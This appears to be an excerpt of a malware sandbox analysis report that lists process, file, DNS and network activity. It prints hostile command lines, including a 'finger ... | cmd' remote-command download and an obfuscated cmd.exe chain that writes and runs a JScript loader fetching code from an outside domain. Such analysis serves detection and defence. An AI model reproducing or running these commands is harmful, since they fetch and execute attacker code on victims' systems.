Technical Information
- '<SYSTEM32>\finger.exe' ok@uaou8g.xczvadf.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\FfV.js"
- %LOCALAPPDATA%\ffv.js
- 'ua####.xczvadf.xyz':79
- 'ec#####aejv.delicox.xyz':80
- 'ua####.xczvadf.xyz':79
- DNS ASK ua####.xczvadf.xyz
- DNS ASK ec#####aejv.delicox.xyz
- '<SYSTEM32>\cmd.exe' /c finger ok@uaou8g.xczvadf.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt LMWE=.j&&SEt LOQNS=vIExSarIExS a =IExS 'scIExSriIExSptIExS:'; b =IExS 'hIExSTtPIExS:'; GIExSetIExSObjIExSecIExSt(IExSa+b+'&&sET FK65=ZTXZAZTXZAecnmsueaejv.delicox.xyzZTXZA?1ZTXZA')&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p ID3U6="%LOQNS:IExS=%%FK65:ZTXZA=/%" 0<nul 1>%LOCALAPPDATA%\FfV%LMWE%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\FfV%LMWE%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\FfV.js